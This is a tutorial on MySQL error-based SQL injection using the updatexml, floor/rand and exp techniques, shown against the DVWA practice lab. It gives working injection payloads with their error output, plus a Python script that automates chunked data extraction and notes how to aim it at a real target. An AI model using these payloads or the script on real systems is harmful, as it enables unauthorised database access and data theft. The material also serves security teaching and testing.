
The main MySQL error-based injection techniques are updatexml, floor and exp. All three depend on the same thing: the server embeds part of the failing expression in its error message, and the application passes that message back to the client. If database errors are not shown to the user, none of these work and you are back to blind techniques.

1. updatexml

At bottom, the updatexml() trick is just a function error. The second argument of updatexml() must be a valid XPath expression; wrapping the query result in 0x7e ('~') makes it invalid XPath, and MySQL quotes the offending string in the error. One caveat a practitioner needs: the XPATH error text is truncated to 32 characters, so longer results (group_concat output, hashes) have to be read in pieces with substring().

mysql> select updatexml(1,concat(0x7e,(select version()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~8.0.20~'

1.1 Experiment

Open DVWA, go to the SQL injection exercise and send the expression above; the page shows the MySQL version number:

XPATH syntax error: '~5.5.47-0ubuntu0.14.04.1~'

Changing the subquery inside concat() extracts other values.

For example, the payload to show the name of the current database (URL-encoded form first, decoded form below):

http://localhost/vulnerabilities/sqli/?id=1%27+union+select+1%2Cupdatexml%281%2Cconcat%280x7e%2C%28select+database%28%29%29%2C0x7e%29%2C1%29%23&Submit=Submit#

1' union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#
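The 32-character limit is the part people trip over, so here is an added example (not code from the page or from DVWA) that automates the updatexml() technique: it builds the payload with a substring() window, parses the XPATH error, and walks the result 31 characters at a time. The MySQL server is replaced by a small simulator over constructed sample values, so the script runs offline; against a real target you would swap fake_mysql for a function that sends the payload in the id parameter and returns the response body.

```python
import re

# Constructed sample values standing in for a DVWA database (not taken from the page).
FAKE_DB = {
    "version()": "5.5.47-0ubuntu0.14.04.1",
    "database()": "dvwa",
    "select group_concat(column_name) from information_schema.columns where table_name='users'":
        "user_id,first_name,last_name,user,password,avatar,last_login,failed_login",
}

XPATH_LIMIT = 32  # MySQL truncates the text of an XPATH syntax error to 32 characters


def updatexml_payload(subquery, offset, length=31):
    """updatexml() expression leaking `length` chars of `subquery` starting at 1-based `offset`.

    A single leading 0x7e ('~') keeps the XPath invalid and leaves 31 of the 32 chars for data.
    """
    return "updatexml(1,concat(0x7e,substring((%s),%d,%d)),1)" % (subquery, offset, length)


def fake_mysql(expr):
    """Simulated server: evaluate the payload the way MySQL would and return the error text."""
    m = re.fullmatch(r"updatexml\(1,concat\(0x7e,substring\(\((.*)\),(\d+),(\d+)\)\),1\)", expr)
    sub, off, ln = m.group(1), int(m.group(2)), int(m.group(3))
    xpath = "~" + FAKE_DB[sub][off - 1:off - 1 + ln]
    return "XPATH syntax error: '%s'" % xpath[:XPATH_LIMIT]


def parse_xpath_error(text):
    """Pull the leaked data out of "XPATH syntax error: '~...'" (None if no such error)."""
    m = re.search(r"XPATH syntax error: '~(.*?)'", text)
    return m.group(1) if m else None


def leak(subquery, oracle=fake_mysql, chunk=31):
    """Read the whole result of `subquery` by sliding a substring() window over it."""
    out, offset = "", 1
    while True:
        piece = parse_xpath_error(oracle(updatexml_payload(subquery, offset, chunk)))
        if not piece:            # no error, or the window ran past the end of the data
            break
        out += piece
        if len(piece) < chunk:   # short window: that was the last piece
            break
        offset += chunk
    return out


if __name__ == "__main__":
    print(leak("version()"))
    print(leak("select group_concat(column_name) from information_schema.columns where table_name='users'"))
```

The short value (the version string) fits in one request; the column list is 73 characters and takes three, which is what the 32-character cap costs you on real targets.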

2. floor

In short, the floor() error comes from combining rand() with group by. When MySQL evaluates group by through a temporary table it computes the group key once to look it up and, if the group is not there yet, computes it again when inserting the new row. Because rand(0) is seeded, floor(rand(0)*2) always starts 0,1,1,0,1,1,...: the first row looks up key 0, inserts key 1; the second row finds key 1; the third row looks up key 0, misses, and then tries to insert key 1, which already exists, so the server raises Duplicate entry with the key, and our concat()'d data, in the message. The source table therefore needs at least three rows; information_schema.tables has plenty. The MySQL documentation on GROUP BY and rand() covers the details.

2.1 Extracting the database version

1' and(select 1 from (select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

Error returned:

Duplicate entry '~5.5.47-0ubuntu0.14.04.1~1' for key 'group_key'


2.2 Extracting the current user

1' and(select 1 from (select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

Error returned:

Duplicate entry '~admin@localhost~1' for key 'group_key'

2.3 Extracting the database in use

1' and(select 1 from (select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

Error returned:

Duplicate entry '~dvwa~1' for key 'group_key'

2.4 Extracting the columns of a table

column_name lives in information_schema.columns, not information_schema.tables, so the inner subquery has to read from there; restrict it with table_schema=database() (and table_name='...' once you know the table) and walk the columns by changing the limit offset:

1' and(select 1 from (select count(*),concat((select concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

Error returned: a Duplicate entry message of the same shape as above, carrying the first column name between the two '~' delimiters instead of the database name; limit 1,1, limit 2,1 and so on return the following columns.

3. exp

The exp() error is an overflow. ~ is MySQL's 64-bit bitwise NOT: applied to a non-numeric string such as a user name it operates on 0 and yields 18446744073709551615, and exp() of that is outside the range of a DOUBLE. The out-of-range message quotes the whole expression, including the value the subquery produced, so the data leaks through it. This is version dependent: it needs the server to echo the evaluated subquery in the message, which later MySQL releases no longer do. Payload:

3.1 Show the current MySQL user

id=1' and exp(~(select * from (select user())x))#

Error returned:

DOUBLE value is out of range in 'exp(~((select 'admin@localhost' from dual)))'
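Added example (not from the page) showing the two halves of this technique: the arithmetic that guarantees the overflow, and the regex that pulls the leaked value out of the out-of-range message. The string-to-integer step is a simplified model of MySQL's coercion (leading numeric prefix, 0 when there is none); the error string in the test is the one shown above.

```python
import math
import re

U64 = (1 << 64) - 1


def mysql_bitnot(value):
    """Model of MySQL's ~ operator: coerce to an unsigned 64-bit integer, then invert.

    MySQL reads the leading numeric prefix of a string and uses 0 when there is none
    (simplified here; good enough for a user name like 'admin@localhost').
    """
    m = re.match(r"\s*[-+]?\d+", str(value))
    n = int(m.group(0)) if m else 0
    return (~n) & U64


def exp_overflows(x):
    """True when exp(x) is out of DOUBLE range, i.e. MySQL would raise the error."""
    try:
        math.exp(x)
        return False
    except OverflowError:
        return True


def parse_exp_error(text):
    """Extract the subquery result quoted inside the out-of-range message (None if absent)."""
    m = re.search(r"DOUBLE value is out of range in 'exp\(~\(\(select '(.*?)' from dual\)\)\)'", text)
    return m.group(1) if m else None


if __name__ == "__main__":
    v = mysql_bitnot("admin@localhost")
    print(v, exp_overflows(v))
    print(parse_exp_error("DOUBLE value is out of range in 'exp(~((select 'admin@localhost' from dual)))'"))
```

exp() only overflows a DOUBLE above roughly 709, so any string result that coerces to 0 is enough; if the leaked value started with digits the NOT would still produce a value far past that threshold.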
